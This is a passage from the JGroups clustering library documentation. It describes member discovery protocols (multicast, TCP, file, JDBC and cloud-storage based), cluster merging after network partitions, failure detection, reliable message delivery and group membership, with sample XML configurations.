discovery responses are received,\nthe information in it will be added to the local caches.\n \n\nSince 3.5 it is possible to define this information in a single file, with each line providing\ninformation about one member. The file contents look like this:\n\n\n----\nm1.1 1 10.240.78.26:7800 T\nm2.1 2 10.240.122.252:7800 F\nm3.1 3 10.240.199.15:7800 F\n----\n\nThis file defines information about 3 members m1.1, m2.1 and m3.1. The first element (\"m1.1\") is the\nlogical name. Next comes the UUID (1), followed by the IP address and port (`10.240.78.26:7800`).\nT means that the member is the current coordinator.\n \nMethods `dumpCache()` can be used to write the current contents of any member to a file (in the above\nformat) and `addToCache()` can be used to add the contents of a file to any member. These operations\ncan for example be invoked via JMX or probe.sh.\n \nRefer to the section on `FILE_PING` for more information on how to use these files to speed up\nthe discovery process.\n \n\n[[PING]]\n==== PING\n\nInitial (dirty) discovery of members. Used to detect the coordinator (oldest member), by\nmcasting PING requests to an IP multicast address.\n \nEach member responds with a packet {C, A}, where C=coordinator's address and A=own address. After N\nmilliseconds or M replies, the joiner determines the coordinator from the responses, and sends a\nJOIN request to it (handled by GMS). If nobody responds, we assume we are the first member of a group.\n \nUnlike TCPPING, PING employs dynamic discovery, meaning that the member does not have to know in advance\nwhere other cluster members are.\n \nPING uses the IP multicasting capabilities of the transport to send a discovery\nrequest to the cluster. It therefore requires UDP as transport.\n \n\n${PING}\n\n\n[[TCPPING_Prot]]\n==== TCPPING\n\nTCPPING is used with TCP as transport, and uses a static list of cluster members's addresses. See\n<<TCPPING>> for details.\n \n\n${TCPPING}\n\nNOTE: It is recommended to include the addresses of _all_ cluster members in `initial_hosts`.\n \n\n\n[[TCPGOSSIP_Prot]]\n==== TCPGOSSIP\n\nTCPGOSSIP uses an external GossipRouter to discover the members of a cluster. See <<TCPGOSSIP>>\nfor details.\n \n\n${TCPGOSSIP}\n\n[[MPING]]\n==== MPING\n\nMPING (=Multicast PING) uses IP multicast to discover the initial membership. It can be used with all\ntransports, but usually is used in combination with TCP. TCP usually requires TCPPING, which has to list\nall cluster members explicitly, but MPING doesn't have this requirement. The typical use case for this\nis when we want TCP as transport, but multicasting for discovery so we don't have to define a static\nlist of initial hosts in TCPPING\n \nMPING uses its own multicast socket for discovery. Properties +$$bind_addr$$+ (can also\nbe set via ++$$-Djgroups.bind_addr=$$++), +$$mcast_addr$$+ and\n+$$mcast_port$$+ can be used to configure it.\n \nNote that MPING requires a separate thread listening on the multicast socket for discovery requests.\n \n\n${MPING}\n\n[[FILE_PING]]\n==== FILE_PING\n\nFILE_PING can be used instead of GossipRouter in cases where no external process is desired.\n \n\nSince 3.5, the way FILE_PING performs discovery has changed. The following paragraphs describe the new\nmechanism to discover members via FILE_PING or subclasses (e.g. S3_PING or GOOGLE_PING),\nso this applies to all cloud-based stores as well.\n \nInstead of storing 1 file per member in the file system or cloud store, we only store 1 file for\n_all_ members. This has the advantage, especially in cloud stores, that the number\nof reads is not a function of the cluster size, e.g. we don't have to perform 1000 reads for member\ndiscovery in a 1000 node cluster, but just a single read. This is important as the cost of\n1000 times the round trip time of a (REST) call to the cloud store is certainly higher that the cost\nof a single call. There may also be a charge for calls to the cloud, so a reduced number of calls lead\nto reduced charges for cloud store access, especially in large clusters.\n\n\nThe current coordinator is always in charge of writing the file; participants never write it, but only\nread it. When there is a split and we have multiple coordinator, we may also have multiple files.\n \n\nThe name of a file is always UUID.logical_name.list, e.g. `0000-0000-000000000001.m1.1.list`, which has\na UUID of 1, a logical name of \"m1.1\" and the suffix \".list\".\n \n\n[[BootstrapConfiguration]]\n===== Configuration with a preconfigured bootstrap file\n\nTo speed up the discovery process when starting a large cluster, a predefined bootstrap file\ncan be used. Every node then needs to have an entry in the file and its UUID and IP address:port\nneeds to be the same as in the file. For example, when using the following bootstrap file:\n\n\n----\nm1.1 1 10.240.78.26:7800 T\nm2.1 2 10.240.122.252:7800 F\nm3.1 3 10.240.199.15:7800 F\n----\n\n, the member called \"m1.1\" needs to have a UUID of 1, and needs to run on host 10.240.78.26 on\nport 7800. The UUID can be injected via an AddressGenerator (see UPerf for an example).\n \nWhen a member starts, it loads the bootstrap file, which contains information about all other members,\nand thus (ideally) never needs to run a discovery process. In the above example, the new joiner also\nknows that the current coordinator (marked with a 'T') is m1.1, so it can send its JOIN request to\nthat node.\n \nWhen the coordinator changes, or members not listed in the file join, the current coordinator\nwrites the file again, so all members have access to the updated information when needed.\n\nIf a bootstrap discovery file is to be used, it needs to be placed into the file system or cloud\nstore in the correct location and with the right name (see the Discovery section for naming details).\n\nThe design is discussed in more detail in\nlink:$$https:\/\/github.com\/belaban\/JGroups\/blob\/master\/doc\/design\/CloudBasedDiscovery.txt$$[CloudBasedDiscovery.txt]\n\n\n===== Removal of zombie files\n\nBy default, a new coordinator C never removes a file created by an old coordinator `A`. E.g. in `{A,B,C,D}` (with\ncoordinator `A`), if `C` becomes coordinator on a split `{A,B} | {C,D}`, then `C` doesn't remove `A`'s file, as there\nis no way for `C` to know whether `A` crashed or whether `A` was partitioned away.\n\nEvery coordinator `P` installs a shutdown hook which removes `P`'s file on termination. However, this doesn't apply\nto a process killed ungracefully, e.g. by `kill -9`. In this case, no shutdown hook will get called. If we had view\n`{A,B,C}`, and `A` was killed via kill -9, and `B` takes over, we'd have files `A.list` and `B.list`.\n\nTo change this, attribute `remove_old_coords_on_view_change` can be set to true. In this case, files created by old\ncoordinators will be removed. In the scenario above, where `A` crashed, `B` would remove `A.list`.\n\nHowever, if we have a split between `{A,B}` and `{C,D}`, `C` would remove `A.list`. To prevent this, every coordinator\nwrites its file again on a view change that has left members or in which the coordinator changed.\n\nThere is still a case which can end up with a zombie file that's never removed: when we have a single member `A` and\nit is killed via `kill -9`. In this case, file `A.list` will never get cleaned up and subsequent joiners will ask\n`A` to join, up to `GMS.max_join_attempts` times.\n\nZombie cleanup can be solved by setting `remove_all_files_on_view_change` to true. In this case, a coordinator\nremoves _all files_ on a view change that has members leaving or changes the coordinator.\n\nNOTE: Setting `remove_old_coords_on_view_change` or `remove_all_files_on_view_change` to true generates more traffic\nto the file system or cloud store. If members are always shut down gracefully, or never killed via `kill -9`, then\nit is recommended to set both attributes to false.\n\n\n${FILE_PING}\n\n\n\n==== JDBC_PING\n\nJDBC_PING uses a DB to store information about cluster nodes used for discovery. All cluster nodes are supposed to be\nable to access the same DB.\n\nWhen a node starts, it queries information about existing members from the database, determines the coordinator and\nthen asks the coord to join the cluster. It also inserts information about itself into the table, so others can\nsubsequently find it.\n\nWhen a node P has crashed, the current coordinator removes P's information from the DB. However, if there is a network\nsplit, then this can be problematic, as crashed members cannot be told from partitioned-away members.\n\nFor instance, if we have `{A,B,C,D}`, and the split creates 2 subclusters `{A,B}` and `{C,D}`,\nthen `A` would remove `{C,D}` because it thinks they crashed, and - likewise - `C` would remove `{A,B}`.\n\nTo solve this, every member re-inserts its information into the DB after a _view change_. So when `C` and `D`'s view\nchanges from `{A,B,C,D}` to `{C,D}`, both sides of the split re-insert their information.\nDitto for the other side of the network split.\n\nThe re-insertion is governed by attributes `info_writer_max_writes_after_view` and `info_writer_sleep_time`: the former\ndefines the number of times re-insertion should be done (in a timer task) after each view change and the latter is the\nsleep time (in ms) between re-insertions.\n\nThe value of this is that dead members are removed from the DB (because they cannot do re-insertion), but network splits\nare handled, too.\n\nAnother attribute `clear_table_on_view_change` governs how zombies are handled. Zombies are table entries for members\nwhich crashed, but weren't removed for some reason. E.g. if we have a single member `A` and kill it (via kill -9), then\nit won't get removed from the table.\n\nIf `clear_table_on_view_change` is set to true, then the coordinator _clears_ the table after a view change (instead of\nonly removing the crashed members), and everybody re-inserts its own information. This attribute can be set to true if\nautomatic removal of zombies is desired. However, it is costly, therefore if no zombies ever occur (e.g. because processes\nare never killed with kill -9), or zombies are removed by a system admin, then it should be set to false.\n\nNOTE: Processes killed with kill -3 are removed from the DB as a shutdown handler will be called on kill -3\n(but not on kill -9).\n \n\n${JDBC_PING}\n\n\n\n==== BPING\n\nBPING uses UDP broadcasts to discover other nodes. The default broadcast address (dest) is\n 255.255.255.255, and should be replaced with a subnet specific broadcast, e.g. 192.168.1.255.\n \n\n${BPING}\n\n\n\n==== RACKSPACE_PING\n\nRACKSPACE_PING uses Rackspace Cloud Files Storage to discover initial members. Each node writes a small\n object in a shared Rackspace container. New joiners read all addresses from the container and ping each\n of the elements of the resulting set of members. When a member leaves, it deletes its corresponding object.\n \n\nThis objects are stored under a container called 'jgroups', and each node will write an object name after\n the cluster name, plus a \"\/\" followed by the address, thus simulating a hierarchical structure.\n \n\n${RACKSPACE_PING}\n\n\n\n==== S3_PING\n\nS3_PING uses Amazon S3 to discover initial members. New joiners read all addresses\nfrom this bucket and ping each of the elements of the resulting set of members. When a member leaves, it\ndeletes its corresponding file.\n \n\nIt's designed specifically for members running on Amazon EC2, where multicast traffic is not allowed and\nthus MPING or PING will not work. When Amazon RDS is preferred over S3, or if a shared database is used,\nan alternative is to use JDBC_PING.\n \n\nEach instance uploads a small file to an S3 bucket and each instance reads the files out of this bucket\nto determine the other members.\n \n\nThere are three different ways to use S3_PING, each having its own tradeoffs between security and\nease-of-use. These are described in more detail below:\n\n* Private buckets, Amazon AWS credentials given to each instance\n* Public readable and writable buckets, no credentials given to each instance\n* Public readable but private writable buckets, pre-signed URLs given to each instance\n Pre-signed URLs are the most secure method since writing to buckets still requires authorization and\n you don't have to pass Amazon AWS credentials to every instance. However, they are also the most complex\n to setup.\n \n\nHere's a configuration example for private buckets with credentials given to each instance:\n \n\n\n[source,xml]\n----\n\n<S3_PING location=\"my_bucket\" access_key=\"access_key\"\n secret_access_key=\"secret_access_key\" timeout=\"2000\"\n num_initial_members=\"3\"\/>\n \n----\n\nHere's an example for public buckets with no credentials:\n \n\n\n[source,xml]\n----\n\n<S3_PING location=\"my_bucket\"\n timeout=\"2000\" num_initial_members=\"3\"\/>\n \n----\n\nAnd finally, here's an example for public readable buckets with pre-signed URLs:\n \n\n\n[source,xml]\n----\n\n<S3_PING pre_signed_put_url=\"http:\/\/s3.amazonaws.com\/my_bucket\/DemoCluster\/node1?AWSAccessKeyId=access_key&Expires=1316276200&Signature=it1cUUtgCT9ZJyCJDj2xTAcRTFg%3D\"\n pre_signed_delete_url=\"http:\/\/s3.amazonaws.com\/my_bucket\/DemoCluster\/node1?AWSAccessKeyId=access_key&Expires=1316276200&Signature=u4IFPRq%2FL6%2FAohykIW4QrKjR23g%3D\"\n timeout=\"2000\" num_initial_members=\"3\"\/>\n \n----\n\n${S3_PING}\n\n\n\n==== AWS_PING\n\nThis is a protocol written by Meltmedia, which uses the AWS API. It is not part of JGroups, but can be\ndownloaded at link:$$http:\/\/meltmedia.github.io\/jgroups-aws\/$$[].\n\n\n==== Native S3 PING\n\nThis implementation by Zalando uses the AWS SDK. It is not part of JGroups, but can be found at\nlink:$$https:\/\/github.com\/zalando\/jgroups-native-s3-ping\/$$[].\n\n\n\n==== GOOGLE_PING\n\nGOOGLE_PING is a subclass of S3_PING and inherits most of the functionality. It uses Google Cloud\n Storage to store information about individual members.\n \n\nThe snippet below shows a sample config:\n \n\n\n[source,xml]\n----\n\n<GOOGLE_PING\n location=\"jgroups-bucket\"\n access_key=\"GXXXXXX\"\n secret_access_key=\"YYYYYY\"\n timeout=\"2000\" num_initial_members=\"3\"\/>\n \n----\n\nThis will use a bucket \"jgroups-bucket\" or create one if it doesn't exist, then create another folder\n under it with the cluster name, and finally use 1 object per member in that location for member info.\n \n\n${GOOGLE_PING}\n\n\n\n==== SWIFT_PING\n\nSWIFT_PING uses Openstack Swift to discover initial members. Each node writes a small\n object in a shared container. New joiners read all addresses from the container and ping each\n of the elements of the resulting set of members. When a member leaves, it deletes its corresponding object.\n \n\nThese objects are stored under a container called 'jgroups' (by default), and each node will write an object name after\n the cluster name, plus a \"\/\" followed by the address, thus simulating a hierarchical structure.\n \n\nCurrently only Openstack Keystone authentication is supported. Here is a sample configuration block:\n \n\n\n[source,xml]\n----\n\n<SWIFT_PING timeout=\"2000\"\n num_initial_members=\"3\"\n auth_type=\"keystone_v_2_0\"\n auth_url=\"http:\/\/localhost:5000\/v2.0\/tokens\"\n username=\"demo\"\n password=\"password\"\n tenant=\"demo\" \/>\n \n----\n\n${SWIFT_PING}\n\n\n\n\n\n==== PDC - Persistent Discovery Cache\n\nThe Persistent Discovery Cache can be used to cache the results of the discovery process persistently.\nE.g. if we have TCPPING.initial_hosts configured to include only members A and B, but have a lot more\nmembers, then other members can bootstrap themselves and find the right coordinator even when neither\nA nor B are running.\n \n\nAn example of a TCP-based stack configuration is:\n \n\n\n[source,xml]\n----\n\n<TCP \/>\n<PDC cache_dir=\"\/tmp\/jgroups\" \/>\n<TCPPING timeout=\"2000\" num_initial_members=\"20\"\n initial_hosts=\"192.168.1.5[7000]\" port_range=\"0\"\n return_entire_cache=\"true\"\n use_disk_cache=\"true\" \/>\n \n----\n\n${PDC}\n\n\n\n=== Merging after a network partition\n\n[[MERGE2]]\n==== MERGE2\n\nIf a cluster gets split for some reasons (e.g. network partition), this protocol merges the subclusters\nback into one cluster. It is only run by the coordinator (the oldest member in a cluster), which\nperiodically multicasts its presence and view information. If another coordinator (for the same cluster)\nreceives this message, it will initiate a merge process. Note that this merges subgroups\n+{A,B}+ and +{C,D,E}+ back into +{A,B,C,D,E}+,\nbut it does _not merge state_. The application has to handle the callback to merge\nstate. See <<HandlingNetworkPartitions>> for suggestion on merging states.\n\nFollowing a merge, the coordinator of the merged group can shift from the typical case of\n\"the coordinator is the member who has been up the longest.\" During the merge process, the coordinators\nof the various subgroups need to reach a common decision as to who the new coordinator is.\nIn order to ensure a consistent result, each coordinator combines the addresses of all the members\nin a list and then sorts the list. The first member in the sorted list becomes the coordinator.\nThe sort order is determined by how the address implements the interface. Then JGroups compares based\non the UUID. So, take a hypothetical case where two machines were running, with one machine running\nthree separate cluster members and the other two members. If communication between the machines were cut,\nthe following subgroups would form:\n+{A,B} and {C,D,E}+\nFollowing the merge, the new view would be: +{C,D,A,B,E}+, with C being the new\ncoordinator.\n \n\nNote that \"A\", \"B\" and so on are just logical names, attached to UUIDs, but the actual sorting is done\n on the actual UUIDs.\n \n${MERGE2}\n\nNOTE: `MERGE2` is deprecated and will be removed in 4.0. Users of it should switch to `MERGE3`.\n\n\n\n[[MERGE3]]\n==== MERGE3\n\nIf a cluster gets split for some reasons (e.g. network partition), this protocol merges the subclusters\nback into one cluster.\n\nAll members periodically send an INFO message with their address (UUID), logical name,\nphysical address and ViewId. The ViewId (<<ViewId>>) is used to see if we have diverging\nviews among the cluster members: periodically, every coordinator looks at the INFO messages received so\nfar and checks if there are any inconsistencies.\n\nIf inconsistencies are found, the _merge leader_ will be the member with the lowest address (UUID).\n\nThe merge leader then asks the senders of the inconsistent ViewIds for their full views. Once received,\nit simply passes a `MERGE` event up the stack, where the merge will be handled (by `GMS`) in exactly the same\nway as if `MERGE2` has generated the `MERGE` event.\n\nThe advantages of `MERGE3` compared to `MERGE2` are:\n\n* Sending of INFO messages is spread out over time, preventing message peaks which might cause\n packet loss. This is especially important in large clusters.\n* Only 1 merge should be running at any time. Competing merges, as happening with `MERGE2`, slow\n down the merge process, and don't scale to large clusters.\n* An INFO message carries the logical name and physical address of a member. Compared to `MERGE2`,\n this allows us to immediately send messages to newly merged members, and not have to solicit\n this information first.\n* On the downside, `MERGE3` has constant (small) traffic by all members.\n* `MERGE3` was written for an IP multicast capable transport (`UDP`), but it also works with other\n transports (such as `TCP`), although it isn't as efficient on `TCP` as on `UDP`.\n\n\n===== Example\n\n[source,xml]\n----\n<MERGE3 max_interval=\"10000\" min_interval=\"5000\" check_interval=\"15000\"\/>\n----\n\nThis means that every member sends out an INFO message at a random interval in range [5000 .. 10000] ms. Every\n15 seconds (`check_interval`), every coordinator checks if it received a ViewId differing from its own, and initiates\na merge if true.\n\n* We have subclusters `{A,B,C}`, `{D,E}` and `{F}`. The subcluster coordinators are `A`, `D` and `F`\n* The network partition now heals\n* `D` checks its received ViewIds, and sees entries from itself and `A`\n** Since broadcasting of INFO messages is unreliable (as `MERGE3` is underneath `NAKACK2` in the stack), the last\n INFO message from `F` might have been dropped\n* `D` or `A` initiates a merge, which results in view `{A,B,C,D,E}`\n* A bit later, on the next check, `F` sees that its ViewId diverges from the ViewId sent in an INFO message by `C`\n* `F` and `A` initiate a new merge which results in merge view `{A,B,C,D,E,F}`\n\nIncreasing `check_interval` decreases the chance of partial merges (as shown above), but doesn't entirely eliminate them:\nmembers are not started at exactly the same time, and therefore their check intervals overlap.\nIf a member's interval elapsed just after receiving INFO messages from a subset of the subclusters\n(e.g. briefly after a partition healed), then we will still have a partial merge.\n\n${MERGE3}\n\n\n\n\n\n\n[[FailureDetection]]\n=== Failure Detection\n\nThe task of failure detection is to probe members of a group and see whether they are alive. When a member is\nsuspected of having failed, then a SUSPECT message is sent to all nodes of the cluster. It is not the task of the\nfailure detection layer to exclude a crashed member (this is done by the group membership protocol, GMS), but\nsimply to notify everyone that a node in the cluster is suspected of having crashed.\n\nThe SUSPECT message is handled by the GMS protocol of the current coordinator only; all other members ignore it.\n \n\n[[FD]]\n==== FD\n\nFailure detection based on a logical ring and heartbeat messages.\n\nMembers form a logical ring; e.g. in view `{A,B,C,D}`, `A` pings `B`, which pings `C`, which pings `D`, which pings `A`.\n'Pinging' means sending a heartbeat.\n\nEach member sends this heartbeat every `timeout` ms to the neighbor to its right. When a member receives a heartbeat, it\nsends back an ack. When the ack is received the timestamp of when a member last heard from its neighbor is reset.\n\nWhen a member doesn't receive any heartbeat acks from its neighbor for `timeout` * `max_tries` ms,\nthat member is declared suspected, and will be excluded by GMS.\n\nThis is done by `FD` multicasting a `SUSPECT(P)` message which is handled by the current coordinator by double-checking\nthe health of `P` (using `VERIFY_SUSPECT`) and - if `P` still doesn't reply - by excluding `P` from the membership.\n\nNote that setting `msg_counts_as_heartbeat` in `P` to true causes the timestamp of `P` in the pinging member to be\nreset.\n\n===== Example\n\n[source,xml]\n----\n<FD timeout=\"3000\" max_tries=\"4\" \/>\n----\n* The membership is `{A,B,C,D,E}`.\n* Now C and D crash at the same time\n* B's next heartbeats won't get an ack\n* After roughly 12 seconds (4 * 3 secs), B suspects C\n** B now starts sending heartbeats to D\n* A (the coordinator) handles the `SUSPECT(C)` message from B and uses `VERIFY_SUSPECT` to double-check that C is really dead\n* After `VERIFY_SUSPECT.timeout` ms, A creates a new view `{A,B,D,E}` excluding C\n* After ca. 12 seconds, B sends a `SUSPECT(D)` message to the coordinator, which eventually also excludes `D`\n\n\n\n${FD}\n\n\n\n[[FD_ALL]]\n==== FD_ALL\n\nFailure detection based on simple heartbeat protocol. Every member periodically multicasts a heartbeat.\nEvery member also maintains a table of all members (minus itself). When data or a heartbeat from P are\nreceived, we reset the timestamp for P to the current time.\nPeriodically, we check for expired members whose timestamp is greater than the timeout, and suspect those.\n\n===== Example\n\n[source,xml]\n----\n<FD_ALL timeout=\"12000\" interval=\"3000\" timeout_check_interval=\"2000\"\/>\n----\n* The membership is `{A,B,C,D,E}`.\n* Every member broadcasts a heartbeat every 3 seconds. When received, the sender's timestamp in the table\n is set to the current time\n* Every member also checks every 2 seconds if any member's timestamp exceeds the timeout and suspects\n that member if this is the case\n* Now C and D crash at the same time\n* After roughly 12-13 seconds, `A`, `B` and `E` broadcast a `SUSPECT(C,D)` message\n* The coordinator (`A`) uses `VERIFY_SUSPECT` to double check if `C` and `D` are dead\n* `A` creates a new view `{A,B,E}` which excludes `C` and `D`\n\nNOTE: Contrary to `FD` which suspects adjacent crashed members `C` and `D` one by one, `FD_ALL` suspects `C` and `D` in\nconstant time. `FD` takes `N` * (`timeout` * `max_tries`) ms, whereas `FD_ALL` takes `timeout` ms\n\n${FD_ALL}\n\n\n\n[[FD_ALL2]]\n==== FD_ALL2\n\nSimilar to `FD_ALL`, but doesn't use any timestamps. Instead, a boolean flag is associated with each\nmember. When a message or heartbeat (sent every `interval` ms) from P is received, P's flag is set to true.\nThe heartbeat checker checks every `timeout` ms for members whose flag is false, suspects those, and\n- when done - resets all flags to false again.\nThe times it takes to suspect a member are the same as for `FD_ALL`\n \n\n${FD_ALL2}\n\n\n\n[[FD_SOCK]]\n==== FD_SOCK\n\nFailure detection protocol based on a ring of TCP sockets created between cluster members, similar to `FD` but\nnot using heartbeat messages.\n\nEach member in a cluster connects to its neighbor (the last member connects to the first), thus forming a ring.\nMember `B` is suspected when its neighbor `A` detects abnormal closing of its TCP socket\n(presumably due to a crash of `B`). However, if `B` is about to leave gracefully, it lets its neighbor `A`\nknow, so that `A` doesn't suspect `B`.\n \n===== Example\n* The membership is `{A,B,C,D,E}`.\n* Members `C` and `D` are killed at the same time\n* `B` notices that `C` abnormally closed its TCP socket and broadcasts a `SUSPECT(C)` message\n* The current coordinator (`A`) asks `VERIFY_SUSPECT` to double check that `C` is dead\n* Meanwhile, `B` tries to create a TCP socket to the next-in-line (`D`) but fails. It therefore broadcasts a\n `SUSPECT(D)` message\n* `A` also handles this message and asks `VERIFY_SUSPECT` to double check if `D` is dead\n* After `VERIFY_SUSPECT` can't verify that `C` and `D` are still alive, `A` creates a new view\n `{A,B,E}` and installs it\n* The time taken for `FD_SOCK` to suspect a member is very small (a few ms)\n\nNOTE: It is recommended to use `FD_SOCK` and `FD` or `FD_ALL` together in the same stack: `FD_SOCK` detects killed\nnodes immediately, and `FD_ALL` (with a higher timeout) detects hung members or kernel panics \/ crashed switches\n(which don't close the TCP connection) after the timeout.\n \n\n${FD_SOCK}\n\n\n[[FD_HOST]]\n==== FD_HOST\n\nTo detect the crash or freeze of entire hosts and all of the cluster members running on them, `FD_HOST`\ncan be used. It is not meant to be used in isolation, as it doesn't detect crashed members on the\nlocal host, but in conjunction with other failure detection protocols, such as `FD_ALL` or `FD_SOCK`.\n\n`FD_HOST` can be used when we have multiple cluster members running on a physical box. For example,\nif we have members `{A,B,C,D}` running on host 1 and `{M,N,O,P}` running on host 2, and host 1 is\npowered down, then `A`, `B`, `C` and `D` are suspected and removed from the cluster together, typically\nin one view change.\n\nBy default, `FD_HOST` uses `InetAddress.isReachable()` to perform liveness checking of other hosts, but\nif property `cmd` is set, then any script or command can be used. `FD_HOST` will launch the command and\npass the IP address ot the host to be checked as argument. Example: `cmd=\"ping -c 3\"`.\n\nA typical failure detection configuration would look like this:\n\n[source,xml]\n----\n...\n<FD_SOCK\/>\n<FD_ALL timeout=\"60000\" interval=\"20000\"\/>\n<FD_HOST interval=\"10000\" timeout=\"35000\" \/>\n...\n----\n\nIf we have members `{A,B,C}` on host `192.168.1.3`, `{M,N,O}` on `192.168.1.4` and `{X,Y,Z}` on `192.168.1.5`, then\nthe behavior is as follows:\n\n.Failure detection behavior\n[options=\"header\"]\n|===============\n|Scenario|Behavior\n|Any member (say `O`) crashes|\n `FD_SOCK` detects this immediately (as the TCP socket was closed). `O` is suspected and\n removed\n \n|Member `Y` hangs|\n `FD_ALL` starts missing heartbeats from `Y` (note that host `192.168.1.5` is up) and suspects\n `Y` after 60 seconds. `Y` is removed from the view.\n \n|Host `192.168.1.3` is shutdown (`shutdown -h now`)|\n Since this is a graceful shutdown, the OS closes all sockets. `FD_SOCK` therefore\n suspects `A`, `B` and `C` and removes them from the view immediately.\n \n|The power supply to host `192.168.1.3` is cut, or `192.168.1.3` panicked|\n `FD_HOST` detects that `192.168.1.3` is not alive and suspects `A`, `B` and `C` after ~35 to 45s.\n \n|Member `N` leaves|\n Since this is a graceful leave, none of the failure detection protocols kick in\n \n\n|===============\n\n\n${FD_HOST}\n\n\n\n==== VERIFY_SUSPECT\n\nVerifies that a suspected member is really dead by pinging that member one last time before excluding it,\n and dropping the suspect message if the member does respond.\n \n\nVERIFY_SUSPECT tries to minimize false suspicions.\n \n\nThe protocol works as follows: it catches SUSPECT events traveling up the stack.\n Then it verifies that the suspected member is really dead. If yes, it passes the SUSPECT event up the\n stack, otherwise it discards it. VERIFY_SUSPECT Has to be placed somewhere above the failure detection\n protocol and below the GMS protocol (receiver of the SUSPECT event). Note that SUSPECT events may be\n reordered by this protocol.\n \n\n${VERIFY_SUSPECT}\n\n\n\n[[ReliableMessageTransmission]]\n\n\n=== Reliable message transmission\n\n[[NAKACK]]\n\n\n==== pbcast.NAKACK\n\nNAKACK provides reliable delivery and FIFO (= First In First Out) properties for messages sent to all\n nodes in a cluster.\n \n\nReliable delivery means that no message sent by a sender will ever be lost, as all messages are\nnumbered with sequence numbers (by sender) and retransmission requests are sent to the sender of\na message if that sequence number is not received.\n\nNOTE: Note that NAKACK can also be configured to send retransmission requests for M to _anyone_ in the cluster,\n rather than only to the sender of M.\n\n\nFIFO order means that all messages from a given sender are received in exactly the order in which\n they were sent.\n \n\nNAKACK is a Lossless and FIFO delivery of multicast messages, using negative acks. E.g. when\n receiving P:1, P:3, P:4, a receiver delivers only P:1, and asks P for retransmission of message 2,\n queuing P3-4. When P2 is finally received, the receiver will deliver P2-4 to the application.\n \n\n${NAKACK}\n\n[[NAKACK2]]\n\n\n==== NAKACK2\n\nNAKACK2 was introduced in 3.1 and is a successor to NAKACK (at some point it will replace NAKACK). It\n has the same properties as NAKACK, but its implementation is faster and uses less memory, plus it\n creates fewer tasks in the timer.\n \n\nSome of the properties of NAKACK were deprecated in NAKACK2, but were not removed so people can simply\n change from NAKACK to NAKACK2 by changing the protocol name in the config.\n \n\n${NAKACK2}\n\n[[UNICAST]]\n\n\n==== UNICAST\n\nUNICAST provides reliable delivery and FIFO (= First In First Out) properties for point-to-point\n messages between one sender and one receiver.\n \n\nReliable delivery means that no message sent by a sender will ever be lost, as all messages are\n numbered with sequence numbers (by sender) and retransmission requests are sent to the sender of\n a message if that sequence number is not received.\n \n\nFIFO order means that all messages from a given sender are received in exactly the order in which\n they were sent.\n \n\nUNICAST uses _positive acks_ for retransmission; sender A keeps sending\n message M until receiver B delivers M and sends an ack(M) to A, or until B leaves the cluster or A\n crashes.\n \n\nAlthough JGroups attempts to send acks selectively, UNICAST will still see a lot of acks on the wire.\n If this is not desired, use UNICAST2 (see <<UNICAST2>>).\n \n\nOn top of a reliable transport, such as TCP, UNICAST is not really needed. However, concurrent\n delivery of messages from the same sender is prevented by UNICAST by acquiring a lock on the sender's\n retransmission table, so unless concurrent delivery is desired, UNICAST should not be removed from\n the stack even if TCP is used.\n \n\n${UNICAST}\n\n[[UNICAST2]]\n\n\n==== UNICAST2\n\nUNICAST2 provides lossless, ordered, communication between 2 members. Contrary to UNICAST, it\n uses _negative acks_ (similar to NAKACK) rather than positive acks. This reduces the communication\n overhead required for sending an ack for every message.\n \n\nNegative acks have sender A simply send messages without retransmission, and receivers never ack\n messages, until they detect a gap: for instance, if A sends messages 1,2,4,5, then B delivers 1 and 2,\n but queues 4 and 5 because it is missing message 3 from A. B then asks A to retransmit 3. When 3 is\n received, messages 3, 4 and 5 can be delivered to the application.\n \n\nCompared to a positive ack scheme as used in UNICAST, negative acks have the advantage that they generate\n less traffic: if all messages are received in order, we never need to do retransmission.\n \n\n${UNICAST2}\n\n[[UNICAST3]]\n\n\n==== UNICAST3\n\nUNICAST3 (available in 3.3) is the successor to UNICAST2, but is based on UNICAST, as it uses a\n positive acknowledgment mechanism. However, speed wise it is similar to UNICAST2\n \n\nDetails of UNICAST3's design can be found here:\n link:$$https:\/\/github.com\/belaban\/JGroups\/blob\/master\/doc\/design\/UNICAST3.txt$$[UNICAST3]\n \n\n${UNICAST3}\n\n[[RSVP]]\n\n\n==== RSVP\n\nThe RSVP protocol is not a reliable delivery protocol per se, but augments reliable protocols such\n as NAKACK, UNICAST or UNICAST2. It should be placed somewhere _above_ these in\n the stack.\n \n\n${RSVP}\n\n[[STABLE]]\n\n\n=== Message stability\n\nTo serve potential retransmission requests, a member has to store received messages until it is known\n that every member in the cluster has received them. Message stability for a given message M means that M\n has been seen by everyone in the cluster.\n \n\nThe stability protocol periodically (or when a certain number of bytes have been received) initiates a\n consensus protocol, which multicasts a stable message containing the highest message numbers for a\n given member. This is called a digest.\n \n\nWhen everyone has received everybody else's stable messages, a digest is computed which consists of the\n minimum sequence numbers of all received digests so far. This is the stability vector, and contain only\n message sequence numbers that have been seen by everyone.\n \n\nThis stability vector is the broadcast to the group and everyone can remove messages from their\n retransmission tables whose sequence numbers are smaller than the ones received in the stability vector.\n These messages can then be garbage collected.\n \n\n\n\n==== STABLE\n\nSTABLE garbage collects messages that have been seen by all members of a cluster. Each member has to\n store all messages because it may be asked to retransmit. Only when we are sure that all members have\n seen a message can it be removed from the retransmission buffers. STABLE periodically gossips its\n highest and lowest messages seen. The lowest value is used to compute the min (all lowest seqnos\n for all members), and messages with a seqno below that min can safely be discarded.\n \n\nNote that STABLE can also be configured to run when N bytes have been received. This is recommended\n when sending messages at a high rate, because sending stable messages based on time might accumulate\n messages faster than STABLE can garbage collect them.\n \n\n${STABLE}\n\n[[GMS]]\n\n\n=== Group Membership\n\nGroup membership takes care of joining new members, handling leave\n requests by existing members, and handling SUSPECT messages for crashed\n members, as emitted by failure detection protocols. The algorithm for\n joining a new member is essentially:\n \n\n\n----\n\n- loop\n- find initial members (discovery)\n- if no responses:\n - become singleton group and break out of the loop\n- else:\n - determine the coordinator (oldest member) from the responses\n - send JOIN request to coordinator\n - wait for JOIN response\n - if JOIN response received:\n - install view and break out of the loop\n - else\n - sleep for 5 seconds and continue the loop\n \n----\n\n\n\n==== pbcast.GMS\n\n${GMS}\n\n\n\n===== Joining a new member\n\nConsider the following situation: a new member wants to join a\n group. The prodedure to do so is:\n \n\n* Multicast an (unreliable) discovery request (ping)\n* Wait for n responses or m milliseconds (whichever is first)\n* Every member responds with the address of the coordinator\n* If the initial responses are > 0: determine the coordinator and start the JOIN protocol\n* If the initial response are 0: become coordinator, assuming that no one else is out there\n\nHowever, the problem is that the initial mcast discovery request\nmight get lost, 